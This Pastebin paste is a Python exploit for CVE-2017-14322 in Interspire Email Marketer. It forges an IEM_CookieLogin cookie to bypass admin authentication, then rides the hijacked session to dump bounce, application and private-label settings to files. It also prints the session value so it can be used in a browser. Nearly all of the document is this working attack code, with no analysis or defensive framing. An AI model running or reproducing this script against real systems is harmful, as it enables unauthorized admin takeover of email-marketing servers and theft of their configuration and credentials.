ToKeiChun

Interspire Email Marketer - Remote Admin Authentication Bypa

Jul 7th, 2019 (edited)
170
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.05 KB | None | 0 0
  1. import requests
  2. import sys
  3. from bs4 import BeautifulSoup
  4. from pprint import pprint
  5.  
  6.  
  7. def cookie_cutter(url):
  8.     with requests.Session() as s:
  9.        s.get(url)
  10.        r = s.get(url)
  11.        response_regex = r.text
  12.        print("requesting initial Cookie\n")
  13.        print(str(r.headers)+"\n")
  14.        
  15.        for key,value in s.cookies.items():
  16.            if key and "IEMSESSIONID" in key:
  17.          
  18.               s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
  19.        print("Attempting To Posion 2nd request with Forged Cookie\n")
  20.        print("-" * 25)
  21.        r = s.get(url)
  22.        response_regex2 = r.text
  23.        print response_regex2
  24.        print(str(r.headers) + "\n")
  25.        if response_regex != response_regex2:
  26.  
  27.           for key,value in s.cookies.items():
  28.               if "IEMSESSIONID" in key:
  29.                  try:
  30.                     #using session riding from previous cookie we grab the info we want :)
  31.                     bounce_info_grab(url,value)
  32.                     app_info_grab(url,value)
  33.                     privt_info_grab(url,value)
  34.                  except:
  35.                      pass
  36.                  return value,r.text
  37.  
  38.  
  39. def bounce_info_grab(url,session_to_ride):
  40.     url_grab = url+"?Page=Settings&Tab=2"
  41.     print(url_grab)
  42.     with requests.Session() as s:
  43.        s.get(url_grab)
  44.        s.cookies.set('IEMSESSIONID',session_to_ride)
  45.        r = s.get(url_grab)
  46.        response_regex = r.text
  47.        soup = BeautifulSoup(response_regex,'html5lib')
  48.        div = soup.find('div', id='div7')
  49.      
  50.        
  51.        outfile = open("bounce_report.txt",'w')
  52.        dataout = """<html><head>Report</head><title>Report</title>
  53.                    <body>""" + str(div) +"""</body></html>"""
  54.        outfile.write(dataout)
  55.        outfile.close()
  56.        for divy in div.contents:
  57.            print(divy)
  58.          
  59. def app_info_grab(url,session_to_ride):
  60.     url_grab = url+"?Page=Settings&Tab=2"
  61.     print(url_grab)
  62.     with requests.Session() as s:
  63.        s.get(url_grab)
  64.        s.cookies.set('IEMSESSIONID',session_to_ride)
  65.        r = s.get(url_grab)
  66.        response_regex = r.text
  67.        soup = BeautifulSoup(response_regex,'html5lib')
  68.        div = soup.find('div', id='div1')
  69.    
  70.        
  71.        outfile = open("application_settings_report.txt",'w')
  72.        dataout = """<html><head>Report</head><title>Report</title>
  73.                    <body>""" + str(div) +"""</body></html>"""
  74.        outfile.write(dataout)
  75.        outfile.close()
  76.        for divy in div.contents:
  77.            print(divy)  
  78.    
  79. def privt_info_grab(url,session_to_ride):
  80.     url_grab = url+"?Page=Settings&Tab=2"
  81.     print(url_grab)
  82.     with requests.Session() as s:
  83.        s.get(url_grab)
  84.        s.cookies.set('IEMSESSIONID',session_to_ride)
  85.        r = s.get(url_grab)
  86.        response_regex = r.text
  87.        soup = BeautifulSoup(response_regex,'html5lib')
  88.        div = soup.find('div', id='div8')
  89.      
  90.        
  91.        outfile = open("privtlbl_settings_report.txt",'w')
  92.        dataout = """<html><head>Report</head><title>Report</title>
  93.                    <body>""" + str(div) +"""</body></html>"""
  94.        outfile.write(dataout)
  95.        outfile.close()
  96.        for divy in div.contents:
  97.            print(divy)  
  98.    
  99. def main():
  100.     url = sys.argv[1]
  101.     print  "Evaluating Target:" +url+ """ For CVE-2017-14322"""+"\n"
  102.     print "-" * 25
  103.     try:
  104.        session_rider_value,content = cookie_cutter(url)
  105.        print "Session Has Been Generated Entering Internal Data Dumping Routine"+"\n"
  106.        print "-" * 25
  107.        print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "
  108.        print "-" * 25
  109.        print  session_rider_value+"\n"
  110.        print "-" * 25
  111.        outfile = open("vulnbypass.txt",'a')
  112.        dataout = url+session_rider_value+"\n"
  113.        outfile.write(dataout)
  114.        outfile.close()
  115.     except:
  116.        print "Target Is Not Vulnerable"
  117.        pass
  118.    
  119.    
  120.  
  121. main()
Add Comment
Please, Sign In to add comment